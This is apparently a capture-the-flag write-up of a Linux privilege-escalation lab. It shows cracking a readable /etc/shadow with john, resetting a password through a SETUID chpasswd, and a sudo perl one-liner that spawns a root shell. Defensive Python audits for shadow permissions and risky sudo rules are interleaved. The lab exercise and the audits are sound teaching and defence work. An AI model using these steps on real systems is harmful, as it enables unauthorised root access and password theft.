The Challenge

So you’ve got a foothold on a regular user account on a Linux box? You’ve tried to escalate privileges to root but nothing seems to work? Keep in mind that many a time, you might have to escalate first to another non-root user with some privileges on the system and then try to escalate to root! Sometimes the user is the weakest part of the security chain! All required tools are available on the lab system.

Your mission is to get a root shell on the box! 

Challenge Accepted

First we run ls -la in the home directory and find nothing, so we try ls -la / instead. There is a /wordlist directory, and inside it a gzipped rockyou.txt. I gunzip it; a wordlist on the box means we have to brute-force something, and one of my first guesses was the shadow file: if we can read it, we know it's the target.

student@attackdefense:/wordlist$ ls /wordlist/
mypasswd  rockyou.txt
student@attackdefense:/wordlist$ cat /etc/shadow
root:*:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
bin:*:17764:0:99999:7:::
sys:*:17764:0:99999:7:::
sync:*:17764:0:99999:7:::
games:*:17764:0:99999:7:::
man:*:17764:0:99999:7:::
lp:*:17764:0:99999:7:::
mail:*:17764:0:99999:7:::
news:*:17764:0:99999:7:::
uucp:*:17764:0:99999:7:::
proxy:*:17764:0:99999:7:::
www-data:*:17764:0:99999:7:::
backup:*:17764:0:99999:7:::
list:*:17764:0:99999:7:::
irc:*:17764:0:99999:7:::
gnats:*:17764:0:99999:7:::
nobody:*:17764:0:99999:7:::
_apt:*:17764:0:99999:7:::
student:!:17800::::::
admin:$1$B86AnBa6$JkxAjd1kSxBIW/4FeNy191:17800::::::
teacher:!:17800::::::

We can cat /etc/shadow, so I check for unshadow, a common tool that combines the passwd and shadow files into a format john can crack. It is present, so we simply pass it passwd and shadow as arguments.

student@attackdefense:/wordlist$ unshadow /etc/passwd /etc/shadow > crackthis

Now it's time to run john with rockyou.txt as our wordlist and crackthis as the file to crack.

student@attackdefense:/wordlist$ john --wordlist=rockyou.txt -show crackthis

It worked, now we have the password!

student@attackdefense:/wordlist$ su admin
Password:
admin@attackdefense:/wordlist$ whoami
admin
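The crack only works because /etc/shadow is readable by an ordinary user and the admin hash is MD5-crypt ($1$), a fast algorithm that a wordlist run gets through cheaply. The following Python audit is an added example, not part of the original write-up: it checks the permission bits on a shadow file and classifies each account's hash by its crypt(3) prefix, flagging legacy or empty ones. SAMPLE_SHADOW is constructed to mirror the shape of the lab's file; its salts and hash values are placeholders, not the ones from the box.

```python
"""Audit shadow-file permissions and hash algorithms.

Added example, not part of the original write-up. It checks the two weaknesses
the crack above relied on: an /etc/shadow readable by an unprivileged user, and
password hashes that use a legacy crypt(3) algorithm such as MD5-crypt ($1$).
SAMPLE_SHADOW is constructed to mirror the shape of the lab's file; its salts
and hash values are placeholders, not the ones from the box.
"""
import os
import stat
from dataclasses import dataclass
from typing import List

# crypt(3) "$id$" prefix -> algorithm name
ALGORITHMS = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt",
    "$y$": "yescrypt", "$gy$": "gost-yescrypt",
}

# Hash states that deserve a finding; anything else (locked, modern slow hash) is fine.
SEVERITY = {
    "empty": "critical",    # no password set at all
    "descrypt": "high",     # traditional 13-char DES crypt, 8-character limit
    "md5crypt": "high",     # salted but fast: a wordlist run is cheap, as the lab shows
    "unknown": "review",    # not a recognised crypt(3) format
    "malformed": "review",  # line does not have the 9 shadow fields
}

# Constructed sample: same layout as the lab's file, placeholder salts and hashes.
SAMPLE_SHADOW = """\
root:*:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
student:!:17800::::::
admin:$1$c0nstruc$PLACEHOLDERmd5cryptHASH0:17800::::::
teacher:!:17800::::::
ops:$6$c0nstruc$PLACEHOLDERsha512cryptHASH:18000:0:99999:7:::
svc:$y$j9T$c0nstructedsalt$PLACEHOLDERyescryptHASH:18500:0:99999:7:::
"""


@dataclass
class Finding:
    user: str
    algorithm: str
    severity: str


def classify_hash(field: str) -> str:
    """Name the crypt(3) algorithm of a shadow password field, or its special state."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"  # '!' or '*' prefix: password login disabled
    if field.startswith("$"):
        prefix = "$" + field.split("$")[1] + "$"
        return ALGORITHMS.get(prefix, "unknown")
    if len(field) == 13:
        return "descrypt"
    return "unknown"


def audit_shadow_lines(lines: List[str]) -> List[Finding]:
    """Return one Finding per account whose password field is weak or malformed."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            findings.append(Finding(fields[0], "malformed", SEVERITY["malformed"]))
            continue
        algorithm = classify_hash(fields[1])
        if algorithm in SEVERITY:
            findings.append(Finding(fields[0], algorithm, SEVERITY[algorithm]))
    return findings


def check_shadow_mode(mode: int) -> List[str]:
    """Report permission bits (stat.S_IMODE) that let non-root users reach the hashes.

    0o640 root:shadow is the usual safe setting; 0o644 is what made the lab crackable.
    """
    problems = []
    if mode & stat.S_IROTH:
        problems.append("world-readable: any local user can copy the hashes for offline cracking")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("writable by group or others: hashes can be replaced")
    return problems


def main(path: str = "/etc/shadow") -> None:
    try:
        problems = check_shadow_mode(stat.S_IMODE(os.stat(path).st_mode))
        with open(path) as fh:
            lines = fh.read().splitlines()
        source = path
    except OSError as exc:  # includes PermissionError when shadow is properly locked down
        print(f"{path}: {exc}; auditing the constructed sample instead")
        problems, lines, source = [], SAMPLE_SHADOW.splitlines(), "sample"
    for problem in problems:
        print(f"[critical] {path}: {problem}")
    for f in audit_shadow_lines(lines):
        print(f"[{f.severity}] {source}: {f.user}: {f.algorithm}")


if __name__ == "__main__":
    main()
```

Run it as root on a real host to audit the live file; as an unprivileged user it should fail to open /etc/shadow (that failure is the correct state) and falls back to the constructed sample. Accounts showing md5crypt or descrypt are candidates for a forced password change, which rehashes them with whatever the PAM stack's current default is.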

Now we're in; let's look around. .sudo_as_admin_successful stands out, but so does the SETUID chpasswd owned by root. Let's try that.

admin@attackdefense:~$ ls -la
total 28
drwxr-x--- 1 admin admin 4096 Mar 28 10:24 .
drwxr-xr-x 1 root root 4096 Sep 26 2018 ..
-rw------- 1 admin admin 17 Mar 28 10:30 .bash_history
-rw-r--r-- 1 root root 0 Sep 26 2018 .sudo_as_admin_successful
-rwsr-xr-x 1 root root 8568 Sep 26 2018 chpasswd
admin@attackdefense:~$ ./chpasswd root
Invalid User!

It was worth a try, right? Let’s see if we can find valid usernames…

admin@attackdefense:~$ strings chpasswd | grep "Invalid User" -A ...
student
teacher
admin
...

Great, we found some valid users. We have already been both student and admin, so let's try to change teacher's password…

admin@attackdefense:~$ ./chpasswd teacher
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
admin@attackdefense:~$ su teacher
Password:

It worked. First things first: sudo -l.

teacher@attackdefense:/home/admin$ sudo -l
User teacher may run the following commands on attackdefense:
    (root) NOPASSWD: /usr/bin/perl

Awesome, we can run perl as root with no password. If you have seen some of my older posts you know what's next: run perl with the -e switch to exec /bin/sh as root. Sweet!

teacher@attackdefense:/home/admin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
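The last step is nothing more than a sudoers rule that hands a scripting interpreter to a user as root, with NOPASSWD on top. The following Python audit is an added example, not part of the original write-up: it parses sudoers-style specification lines and the per-user lines that sudo -l prints, and reports rules that run ALL, a shell, or an interpreter as root. SAMPLE_SUDOERS is constructed for the demo; only the teacher line mirrors the lab, the other accounts and paths are invented.

```python
"""Flag sudo rules that amount to a root shell, like the teacher account's perl rule.

Added example, not part of the original write-up. It parses sudoers-style
specification lines (user host = (runas) [NOPASSWD:] cmd, cmd ...) and the
per-user lines that `sudo -l` prints, then reports rules that run ALL, a shell,
or a scripting interpreter as root; NOPASSWD raises the severity. SAMPLE_SUDOERS
is constructed for the demo; only the teacher line mirrors the lab.
"""
import os
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
INTERPRETER_RE = re.compile(r"(perl|python|ruby)[0-9.]*")

# user host = (runas) cmds   -- host must not swallow the '='
SPEC_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
# "(root) NOPASSWD: /usr/bin/perl" as printed by sudo -l
SUDO_L_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")

# Constructed sample; only the teacher rule is the one from the lab.
SAMPLE_SUDOERS = """\
Defaults env_reset
teacher ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/local/sbin/rotate-logs
ops     ALL=(ALL:ALL) ALL
deploy  ALL=(root) PASSWD: /usr/bin/systemctl restart app.service
"""


@dataclass
class Rule:
    user: str
    runas: str     # run-as user from "(user:group)"; sudoers defaults it to root
    command: str   # program plus any arguments, or "ALL"
    nopasswd: bool


def _split_cmds(user: str, runas: Optional[str], cmds: str) -> List[Rule]:
    """Expand a comma-separated command list; a NOPASSWD/PASSWD tag sticks to the commands after it."""
    runas_user = (runas or "root").split(":")[0].strip() or "root"
    rules, nopasswd = [], False
    for part in cmds.split(","):
        part = part.strip()
        m = TAG_RE.match(part)
        while m:
            if m.group(1) == "NOPASSWD":
                nopasswd = True
            elif m.group(1) == "PASSWD":
                nopasswd = False
            part = part[m.end():]
            m = TAG_RE.match(part)
        if part:
            rules.append(Rule(user, runas_user, part, nopasswd))
    return rules


def parse_rules(text: str, sudo_l_user: Optional[str] = None) -> List[Rule]:
    """Parse sudoers lines, or `sudo -l` output when sudo_l_user names the account it ran as."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] == "#" or line.startswith("Defaults") or line.split()[0].endswith("_Alias"):
            continue
        if line.startswith("(") and sudo_l_user:
            m = SUDO_L_RE.match(line)
            if m:
                rules += _split_cmds(sudo_l_user, m.group("runas"), m.group("cmds"))
            continue
        m = SPEC_RE.match(line)
        if m:
            rules += _split_cmds(m.group("user"), m.group("runas"), m.group("cmds"))
    return rules


def assess(rule: Rule) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) when the rule gives root-level code execution, else None."""
    if rule.runas not in ("root", "ALL"):
        return None
    if rule.command == "ALL":
        reason = "any command as root"
    else:
        base = os.path.basename(rule.command.split()[0])
        if base in SHELLS:
            reason = f"{base} is a shell"
        elif INTERPRETER_RE.fullmatch(base):
            reason = f"{base} executes code handed to it on the command line"
        else:
            return None
    return ("critical" if rule.nopasswd else "high"), reason


def audit(text: str, sudo_l_user: Optional[str] = None) -> List[Tuple[Rule, str, str]]:
    """Return (rule, severity, reason) for every dangerous rule in the text."""
    out = []
    for rule in parse_rules(text, sudo_l_user):
        verdict = assess(rule)
        if verdict:
            out.append((rule, verdict[0], verdict[1]))
    return out


if __name__ == "__main__":
    for rule, severity, reason in audit(SAMPLE_SUDOERS):
        tag = "NOPASSWD" if rule.nopasswd else "password"
        print(f"[{severity}] {rule.user} -> ({rule.runas}) {rule.command} [{tag}]: {reason}")
```

Feed it the contents of /etc/sudoers and /etc/sudoers.d/* on a host you administer, or the output of sudo -l for a given account. The interpreter list is deliberately short; the fix for a rule like teacher's is not a longer blocklist but replacing the interpreter with a root-owned, non-writable script that performs the one task the user actually needs, and dropping NOPASSWD unless automation truly requires it.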

Game Over.